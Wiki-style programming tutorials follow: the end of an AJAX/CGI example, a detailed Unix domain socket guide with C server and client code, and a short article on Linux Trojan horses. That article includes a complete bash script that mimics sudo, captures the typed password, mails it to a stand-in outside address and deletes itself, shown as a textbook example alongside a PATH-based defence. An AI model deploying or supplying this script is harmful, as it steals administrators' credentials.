cc ajax_server.c -o ajax_server

==CGI browser component==

The CGI browser component is the same as the PHP browser component, except for a slight change in the submit_url. The syntax to tell the web server to execute an executable is /cgi-bin/ followed by the filename. For security, the web server executes programs only from designated directories. In this case, the directory is /usr/lib/cgi-bin/.{{efn|The web server may be configured to add other executable directories.}}

  • cd /var/www/html
  • Edit a file named ajax_cgi.html:

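<!DOCTYPE html>
<title>Hello World</title>
<script src="ajax_submit.js"></script>
<p>What is your name? <input type="text" id="person_name"></p>
<div id="destination_division"></div>
<button
    onclick="ajax_submit(
        'destination_division',
        '/cgi-bin/ajax_server',
        document.getElementById( 'person_name' ).value )">
    Submit
</button>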

  1. Point your browser to http://localhost/ajax_cgi.html
  2. Type in your name.
  3. Press Submit

Unix domain socket

In client-server computing, a Unix domain socket is a Berkeley socket that allows data to be exchanged between two processes executing on the same Unix or Unix-like host computer.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|quote=Sockets are a method of IPC that allow data to be exchanged between applications, either on the same host (computer) or on different hosts connected by a network.

|isbn=978-1-59327-220-3

|page=1149}} This is similar to an Internet domain socket that allows data to be exchanged between two processes executing on different host computers.

Regardless of the range of communication (same host or different host),{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1150}} Unix computer programs that perform socket communication are similar. The only difference between the two ranges of communication is how a name is converted into the address parameter needed to bind the socket. For a Unix domain socket, the name is a /path/filename. For an Internet domain socket, the name is an IP address:Port number. In either case, the name is called an address.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|quote=The server binds its socket to a well-known address (name) so that clients can locate it.

|page=1150}}

Two processes may communicate with each other if each obtains a socket. The server process binds its socket to an address, opens a listen channel, and then continuously loops. Inside the loop, the server process is put to sleep while waiting to accept a client connection.{{cite book

|title=Unix Network Programming

|last1=Stevens

|first1=Richard W.

|last2=Fenner

|first2=Bill

|last3=Rudoff

|first3=Andrew M.

|publisher=Pearson Education

|year=2004

|edition=3rd

|isbn=81-297-0710-1

|quote=Normally, the server process is put to sleep in the call to accept, waiting for a client connection to arrive and be accepted.

|page=14}} Upon accepting a client connection, the server then executes a read system call that blocks until data arrives. The client connects to the server's socket via the server's address. The client process then writes a message for the server process to read. The application's algorithm may entail multiple read/write interactions. Upon completion of the algorithm, the client executes exit(){{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1169}} and the server executes close().{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1159}}

For a Unix domain socket, the socket's address is a /path/filename identifier. The server will create /path/filename on the filesystem to act as a lock file semaphore. No I/O occurs on this file when the client and server send messages to each other.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1166}}

=History=

Sockets first appeared in Berkeley Software Distribution 4.2 (1983).{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1149}} The socket application programming interface became a POSIX standard in 2000. It has been ported to virtually every Unix implementation and most other operating systems.

=Socket instantiation=

Both the server and the client must instantiate a socket object by executing the socket() system call. Its usage is{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1153}}

int socket( int domain, int type, int protocol );

The domain parameter should be one of the following common ranges of communication:{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1151}}

  1. Within the same host by using the constant AF_UNIX{{efn|Alternatively, PF_UNIX or AF_LOCAL may be used.{{cite web

| url = http://man7.org/linux/man-pages/man7/unix.7.html

| date = 30 April 2018

| title = Linux Programmer's Manual (unix - sockets for local interprocess communication)

| access-date = 22 February 2019

| df = dmy-all}} The AF stands for "Address Family", and the PF stands for "Protocol Family".}}

  2. Between two hosts via the IPv4 protocol by using the constant AF_INET
  3. Between two hosts via the IPv6 protocol by using the constant AF_INET6

The Unix domain socket label is used when the domain parameter's value is AF_UNIX. The Internet domain socket label is used when the domain parameter's value is either AF_INET or AF_INET6.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1197}}

The type parameter should be one of the following common socket types:

  1. SOCK_STREAM will create a stream socket. A stream socket provides a reliable, bidirectional, and connection-oriented communication channel between two processes. For internet domain sockets, data is carried using the Transmission Control Protocol (TCP).
  2. SOCK_DGRAM will create a datagram socket.{{efn|A datagram socket should not be confused with a datagram packet used in the network layer.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1183}}}} A datagram socket is connectionless and preserves message boundaries. For internet domain sockets, data is carried using the User Datagram Protocol (UDP).{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1152}}

  3. SOCK_SEQPACKET will create a sequenced-packet socket. Similar to a stream socket, it is connection-oriented, but message boundaries are preserved, as with datagram sockets. For internet domain sockets, the Stream Control Transmission Protocol is used.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1285}}

  4. SOCK_RAW will create a raw Internet Protocol (IP) datagram socket. A raw socket bypasses the transport layer and allows applications to interface directly with the network layer.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1184}} This option is only available for internet domain sockets.
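The difference in message boundaries between stream and datagram sockets can be sketched as follows. This is an illustration under stated assumptions: it uses socketpair(), a POSIX call not discussed in this article, purely as a convenient way to obtain two connected AF_UNIX descriptors in one process, and the helper name first_read_size is hypothetical.

```c
#include <assert.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical helper: writes "abc" and then "def" into one end of a   */
/* connected AF_UNIX socket pair of the given type, and returns the     */
/* byte count delivered by the first read() on the other end.           */
int first_read_size( int type )
{
    int pair_fd[ 2 ];
    char buffer[ 64 ];
    int read_count;

    if ( socketpair( AF_UNIX, type, 0, pair_fd ) == -1 ) return -1;

    if ( write( pair_fd[ 0 ], "abc", 3 ) != 3 ) assert( 0 );
    if ( write( pair_fd[ 0 ], "def", 3 ) != 3 ) assert( 0 );

    read_count = (int) read( pair_fd[ 1 ], buffer, sizeof( buffer ) );

    close( pair_fd[ 0 ] );
    close( pair_fd[ 1 ] );

    return read_count;
}
```

With SOCK_DGRAM, the first read() delivers exactly one 3-byte message. With SOCK_STREAM, the two writes form one byte stream, so the first read() may deliver more than 3 bytes.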

The protocol parameter should be set to zero, except for raw sockets, where the protocol parameter should be set to IPPROTO_RAW.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1153}}

==socket() return value==

socket_fd = socket( int domain, int type, int protocol );

Like the regular-file open() system call, the socket() system call returns a file descriptor.{{efn|In UNIX, Everything is a file.}} The return value's suffix _fd stands for file descriptor.

=Server bind to /path/filename=

After instantiating a new socket, the server binds the socket to an address. For a Unix domain socket, the address is a /path/filename.

Because the socket address may be either a /path/filename or an IP_address:Port_number, the socket application programming interface requires the address to first be set into a structure. For a Unix domain socket, the structure is{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1165}}

struct sockaddr_un {

sa_family_t sun_family; /* AF_UNIX */

char sun_path[ 92 ];

};

The _un suffix stands for unix. For an Internet domain socket, the suffix will be either _in or _in6. The sun_ prefix stands for socket unix.
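Because sun_path is a fixed-size array, copying an overlong path into it would overflow the structure. A minimal sketch of a length-checked fill is shown below. The helper name set_unix_address is hypothetical, and the check uses sizeof rather than a hard-coded length because the array size differs between systems.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Hypothetical helper: fills *address for the given path.           */
/* Returns 0 on success, or -1 if path does not fit in sun_path      */
/* together with its terminating null character.                     */
int set_unix_address( struct sockaddr_un *address, const char *path )
{
    if ( strlen( path ) >= sizeof( address->sun_path ) ) return -1;

    memset( address, 0, sizeof( *address ) );

    address->sun_family = AF_UNIX;
    strcpy( address->sun_path, path );

    return 0;
}
```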

Computer program to create and bind a stream Unix domain socket:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Should be 91 characters or less. Some Unix-like systems allow slightly more. */

/* Use /tmp directory for demonstration only. */

char *socket_address = "/tmp/mysocket.sock";

int main( void )

{

int server_socket_fd;

struct sockaddr_un sockaddr_un = {0};

int return_value;

server_socket_fd = socket( AF_UNIX, SOCK_STREAM, 0 );

if ( server_socket_fd == -1 ) assert( 0 );

/* Remove (maybe) a prior run. */

remove( socket_address );

/* Construct the bind address structure. */

sockaddr_un.sun_family = AF_UNIX;

strcpy( sockaddr_un.sun_path, socket_address );

return_value =

bind(

server_socket_fd,

(struct sockaddr *) &sockaddr_un,

sizeof( struct sockaddr_un ) );

/* If socket_address exists on the filesystem, then bind will fail. */

if ( return_value == -1 ) assert( 0 );

/* Listen and accept code omitted. */

}

The second parameter for bind() is a pointer to struct sockaddr. However, the argument passed to the function is the address of a struct sockaddr_un. struct sockaddr is a generic structure that is never instantiated directly; it appears only in the formal parameter declaration for bind(). Because each range of communication has its own address structure, this generic structure was created as a cast placeholder.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1154}}

=Server listen for a connection=

After binding to an address, the server opens a listen channel by executing listen(). Its usage is{{cite web

|title=Linux manual page for listen()

|url=https://man7.org/linux/man-pages/man2/listen.2.html}}

int listen( int server_socket_fd, int backlog );

Snippet to listen:

if ( listen( server_socket_fd, 4096 ) == -1 ) assert( 0 );

For a Unix domain socket, listen() will most likely succeed and return 0. For an Internet domain socket, if the port is in use, listen() returns -1.

The backlog parameter sets the queue size for pending connections.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1157}} The server may be busy when a client executes a connect() request. Connection requests up to this limit will succeed. If the backlog value passed in exceeds the default maximum, then the maximum value is used.
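As a sketch of requesting the largest backlog, the example below passes the SOMAXCONN constant from sys/socket.h to listen() and then queries the SO_ACCEPTCONN socket option to confirm the socket is listening. The function names is_listening and listen_demo are hypothetical, and the /tmp path used when calling it is for demonstration only.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

/* Hypothetical helper: returns 1 if socket_fd is in the listening state. */
int is_listening( int socket_fd )
{
    int accepting = 0;
    socklen_t length = sizeof( accepting );

    if ( getsockopt( socket_fd, SOL_SOCKET, SO_ACCEPTCONN,
                     &accepting, &length ) == -1 ) return 0;

    return accepting != 0;
}

/* Hypothetical demo: binds to path and calls listen() with SOMAXCONN.   */
/* Returns 1 if the socket was not listening before listen() and was     */
/* listening afterwards, 0 otherwise, and -1 on a setup error.           */
int listen_demo( const char *path )
{
    struct sockaddr_un address = {0};
    int socket_fd;
    int before;
    int after;

    if ( strlen( path ) >= sizeof( address.sun_path ) ) return -1;

    socket_fd = socket( AF_UNIX, SOCK_STREAM, 0 );
    if ( socket_fd == -1 ) return -1;

    /* Remove (maybe) a prior run. */
    unlink( path );

    address.sun_family = AF_UNIX;
    strcpy( address.sun_path, path );

    if ( bind( socket_fd, (struct sockaddr *) &address,
               sizeof( address ) ) == -1 ) assert( 0 );

    before = is_listening( socket_fd );

    if ( listen( socket_fd, SOMAXCONN ) == -1 ) assert( 0 );

    after = is_listening( socket_fd );

    close( socket_fd );
    unlink( path );

    return before == 0 && after == 1;
}
```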

=Server accept a connection=

After opening a listen channel, the server enters an infinite loop. Inside the loop is a system call to accept(), which puts the server process to sleep. The accept() system call will return a file descriptor when a client process executes connect().{{cite web

|title=Linux manual page for accept()

|url=https://man7.org/linux/man-pages/man2/accept.2.html}}

Snippet to accept a connection:

int accept_socket_fd;

while ( 1 )

{

accept_socket_fd = accept( server_socket_fd, NULL, NULL );

if ( accept_socket_fd == -1 ) assert( 0 );

if ( accept_socket_fd > 0 ) { /* client is connected */ }

}

=Server I/O on a socket=

When accept() returns a positive integer, the server engages in an algorithmic dialog with the client.

Stream socket input/output may execute the regular-file system calls of read() and write(). However, more control is available if a stream socket executes the socket-specific system calls of send() and recv(). Alternatively, datagram socket input/output should execute the socket-specific system calls of sendto() and recvfrom().{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1160}}
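One example of the extra control offered by recv() is its flags argument. The sketch below uses the MSG_PEEK flag to examine pending data without removing it from the socket's receive queue. It relies on socketpair() only as a shortcut to obtain two connected descriptors in one process, and the function name peek_demo is hypothetical.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical demo: sends "hola" (with its null terminator), peeks at */
/* it with MSG_PEEK, and then receives it normally.                     */
/* Returns 1 if both calls delivered the same 5 bytes, -1 on error.     */
int peek_demo( void )
{
    int pair_fd[ 2 ];
    char peeked[ 16 ] = {0};
    char consumed[ 16 ] = {0};
    ssize_t peek_count;
    ssize_t read_count;

    if ( socketpair( AF_UNIX, SOCK_STREAM, 0, pair_fd ) == -1 ) return -1;

    if ( send( pair_fd[ 0 ], "hola", 5, 0 ) != 5 ) assert( 0 );

    /* MSG_PEEK copies the data but leaves it queued. */
    peek_count = recv( pair_fd[ 1 ], peeked, sizeof( peeked ), MSG_PEEK );

    /* A flags value of 0 behaves like read() and consumes the data. */
    read_count = recv( pair_fd[ 1 ], consumed, sizeof( consumed ), 0 );

    close( pair_fd[ 0 ] );
    close( pair_fd[ 1 ] );

    return peek_count == 5
    &&     read_count == 5
    &&     strcmp( peeked, consumed ) == 0;
}
```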

For a basic stream socket, the server receives data with read( accept_socket_fd ) and sends data with write( accept_socket_fd ).

Snippet to illustrate I/O on a basic stream socket:

int accept_socket_fd;

while ( 1 )

{

accept_socket_fd = accept( server_socket_fd, NULL, NULL );

if ( accept_socket_fd == -1 ) assert( 0 );

if ( accept_socket_fd > 0 )

{

server_algorithmic_dialog( accept_socket_fd );

}

}

#define BUFFER_SIZE 1024

void server_algorithmic_dialog(

int accept_socket_fd )

{

char input_buffer[ BUFFER_SIZE ];

char output_buffer[ BUFFER_SIZE ];

read( accept_socket_fd, input_buffer, BUFFER_SIZE );

if ( strcasecmp( input_buffer, "hola" ) == 0 )

strcpy( output_buffer, "Hola Mundo" );

else

if ( strcasecmp( input_buffer, "ciao" ) == 0 )

strcpy( output_buffer, "Ciao Mondo" );

else

strcpy( output_buffer, "Hello World" );

write( accept_socket_fd, output_buffer, strlen( output_buffer ) + 1 );

}

=Server close a connection=

The algorithmic dialog ends when either the algorithm concludes or read( accept_socket_fd ) returns a value less than 1. To close the connection, execute the close() system call.

Snippet to close a connection:

int accept_socket_fd;

while ( 1 )

{

accept_socket_fd = accept( server_socket_fd, NULL, NULL );

if ( accept_socket_fd == -1 ) assert( 0 );

if ( accept_socket_fd > 0 )

{

server_algorithmic_dialog( accept_socket_fd );

close( accept_socket_fd );

}

}

Snippet to illustrate the end of a dialog:

#define BUFFER_SIZE 1024

void server_algorithmic_dialog(

int accept_socket_fd )

{

char buffer[ BUFFER_SIZE ];

int read_count;

/* Omit algorithmic dialog */

read_count = read( accept_socket_fd, buffer, BUFFER_SIZE );

if ( read_count < 1 ) return;

/* Omit algorithmic dialog */

}
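The end-of-dialog condition can be observed in isolation. In the sketch below, one end of a connected stream socket pair is closed, and read() on the other end then returns 0. The use of socketpair() and the function name read_after_peer_close are assumptions made for this illustration.

```c
#include <assert.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical demo: closes one end of a connected stream socket pair */
/* and returns what read() reports on the surviving end.               */
int read_after_peer_close( void )
{
    int pair_fd[ 2 ];
    char buffer[ 16 ];
    int read_count;

    if ( socketpair( AF_UNIX, SOCK_STREAM, 0, pair_fd ) == -1 ) return -1;

    /* The peer goes away without sending anything. */
    close( pair_fd[ 0 ] );

    /* With no data queued and no peer, read() reports end-of-file. */
    read_count = (int) read( pair_fd[ 1 ], buffer, sizeof( buffer ) );

    close( pair_fd[ 1 ] );

    return read_count;
}
```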

=Client instantiate and connect to /path/filename=

Computer program for the client to instantiate and connect a socket:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Must match the server's socket_address. */

char *socket_address = "/tmp/mysocket.sock";

int main( void )

{

int client_socket_fd;

struct sockaddr_un sockaddr_un = {0};

int return_value;

client_socket_fd = socket( AF_UNIX, SOCK_STREAM, 0 );

if ( client_socket_fd == -1 ) assert( 0 );

/* Construct the client address structure. */

sockaddr_un.sun_family = AF_UNIX;

strcpy( sockaddr_un.sun_path, socket_address );

return_value =

connect(

client_socket_fd,

(struct sockaddr *) &sockaddr_un,

sizeof( struct sockaddr_un ) );

/* If socket_address doesn't exist on the filesystem, */

/* or if the server's connection-request queue is full, */

/* then connect() will fail. */

if ( return_value == -1 ) assert( 0 );

/* close( client_socket_fd ); <-- optional */

exit( EXIT_SUCCESS );

}

=Client I/O on a socket=

If connect() returns zero, the client can engage in an algorithmic dialog with the server. The client may send stream data via write( client_socket_fd ) and may receive stream data via read( client_socket_fd ).

Snippet to illustrate client I/O on a stream socket:

{

/* Omit construction code */

return_value =

connect(

client_socket_fd,

(struct sockaddr *) &sockaddr_un,

sizeof( struct sockaddr_un ) );

if ( return_value == -1 ) assert( 0 );

if ( return_value == 0 )

{

client_algorithmic_dialog( client_socket_fd );

}

/* close( client_socket_fd ); <-- optional */

/* When the client process terminates, */

/* if the server attempts to read(), */

/* then read_count will be either 0 or -1. */

/* This is a message for the server */

/* to execute close(). */

exit( EXIT_SUCCESS );

}

#define BUFFER_SIZE 1024

void client_algorithmic_dialog(

int client_socket_fd )

{

char buffer[ BUFFER_SIZE ];

int read_count;

strcpy( buffer, "hola" );

write( client_socket_fd, buffer, strlen( buffer ) + 1 );

read_count = read( client_socket_fd, buffer, BUFFER_SIZE );

if ( read_count > 0 ) puts( buffer );

}
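The server and client steps can be exercised together in a single program. The following is a minimal sketch, not a production design: it assumes fork() is available, serves exactly one client, and uses the hypothetical function name round_trip_demo. The socket is bound and listening before fork() so that the child's connect() cannot arrive too early.

```c
#include <assert.h>
#include <string.h>
#include <strings.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

#define BUFFER_SIZE 1024

/* Hypothetical demo: the parent acts as the server and a forked child  */
/* acts as the client. Returns 1 if the client received "Hola Mundo".   */
int round_trip_demo( const char *path )
{
    struct sockaddr_un address = {0};
    char buffer[ BUFFER_SIZE ] = {0};
    int server_socket_fd;
    int accept_socket_fd;
    int status;
    pid_t child;

    if ( strlen( path ) >= sizeof( address.sun_path ) ) return 0;

    address.sun_family = AF_UNIX;
    strcpy( address.sun_path, path );

    server_socket_fd = socket( AF_UNIX, SOCK_STREAM, 0 );
    if ( server_socket_fd == -1 ) return 0;

    /* Remove (maybe) a prior run. */
    unlink( path );

    if ( bind( server_socket_fd, (struct sockaddr *) &address,
               sizeof( address ) ) == -1 ) assert( 0 );

    if ( listen( server_socket_fd, 1 ) == -1 ) assert( 0 );

    child = fork();
    if ( child == -1 ) assert( 0 );

    if ( child == 0 )
    {
        /* Client: connect, send "hola", and check the reply. */
        int client_socket_fd = socket( AF_UNIX, SOCK_STREAM, 0 );

        if ( client_socket_fd == -1 ) _exit( 1 );

        if ( connect( client_socket_fd, (struct sockaddr *) &address,
                      sizeof( address ) ) == -1 ) _exit( 1 );

        if ( write( client_socket_fd, "hola", 5 ) != 5 ) _exit( 1 );

        if ( read( client_socket_fd, buffer, BUFFER_SIZE - 1 ) < 1 ) _exit( 1 );

        _exit( strcmp( buffer, "Hola Mundo" ) == 0 ? 0 : 1 );
    }

    /* Server: accept one client, read its message, and reply. */
    accept_socket_fd = accept( server_socket_fd, NULL, NULL );
    if ( accept_socket_fd == -1 ) assert( 0 );

    if ( read( accept_socket_fd, buffer, BUFFER_SIZE - 1 ) > 0
    &&   strcasecmp( buffer, "hola" ) == 0 )
    {
        if ( write( accept_socket_fd, "Hola Mundo", 11 ) != 11 ) assert( 0 );
    }

    close( accept_socket_fd );
    close( server_socket_fd );
    unlink( path );

    /* The child's exit status reports whether the reply matched. */
    if ( waitpid( child, &status, 0 ) == -1 ) return 0;

    return WIFEXITED( status ) && WEXITSTATUS( status ) == 0;
}
```

The buffers are zero-initialized and each read() leaves the last byte untouched, so the string comparisons always see a null-terminated string.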

Linux Trojan horse

A Trojan horse is a program that purports to perform some legitimate function, yet upon execution it compromises the user's security.{{cite book

| last1 = Wood

| first1 = Patrick H.

| last2 = Kochan

| first2 = Stephen G.

| title = UNIX System Security

| publisher = Hayden Books

| year = 1985

| page = 42

| isbn = 0-8104-6267-2

}} A simple example is the following malicious version of the Linux sudo command. An attacker would place this script in a publicly writable directory (e.g., /tmp). If an administrator happens to be in this directory and executes sudo, then the Trojan may execute, compromising the administrator's password.

#!/usr/bin/env bash

# Turn off the character echo to the screen. sudo does this to prevent the user's password from appearing on screen when they type it in.

stty -echo

# Prompt user for password and then read input. To disguise the nature of this malicious version, do this 3 times to imitate the behavior of sudo when a user enters the wrong password.

prompt_count=1

while [ $prompt_count -le 3 ]; do

echo -n "[sudo] password for $(whoami): "

read password_input

echo

sleep 3 # sudo will pause between repeated prompts

prompt_count=$(( prompt_count + 1 ))

done

# Turn the character echo back on.

stty echo

echo $password_input | mail -s "$(whoami)'s password" outside@creep.com

# Display sudo's actual error message and then delete self.

echo "sudo: 3 incorrect password attempts"

rm $0

exit 1 # sudo returns 1 with a failed password attempt

To prevent a sudo Trojan horse, set the . entry in the PATH environment variable to be located at the tail end.{{cite book

| last1 = Wood

| first1 = Patrick H.

| last2 = Kochan

| first2 = Stephen G.

| title = UNIX System Security

| publisher = Hayden Books

| year = 1985

| page = 43

| isbn = 0-8104-6267-2

| quote = The above Trojan horse works only if a user's PATH is set to search the current directory for commands before searching the system's directories.

}} For example, the setting PATH=/usr/local/bin:/usr/bin:. searches the current directory last.
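A defensive check for this condition can be sketched in C. The function below is hypothetical and only inspects a PATH-style string; it does not modify the environment. It also treats an empty entry as the current directory, which is the POSIX convention for PATH and is an assumption beyond the cited source.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical helper: returns 1 if path_value searches the current    */
/* directory (a "." entry or an empty entry) anywhere before its final  */
/* entry, and 0 otherwise.                                              */
int current_directory_before_tail( const char *path_value )
{
    const char *entry = path_value;

    for ( ;; )
    {
        const char *colon = strchr( entry, ':' );
        size_t length;

        /* No further colon: this is the final entry, which may be ".". */
        if ( colon == NULL ) return 0;

        length = (size_t) ( colon - entry );

        if ( length == 0 ) return 1;
        if ( length == 1 && entry[ 0 ] == '.' ) return 1;

        entry = colon + 1;
    }
}
```

A caller could pass the result of getenv( "PATH" ), after checking it for NULL, and warn the user when the function returns 1.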

See also

  • {{Annotated link|Computer program}}
  • {{Annotated link|Field (computer science)}}

Notes

{{Notelist}}

References

{{reflist}}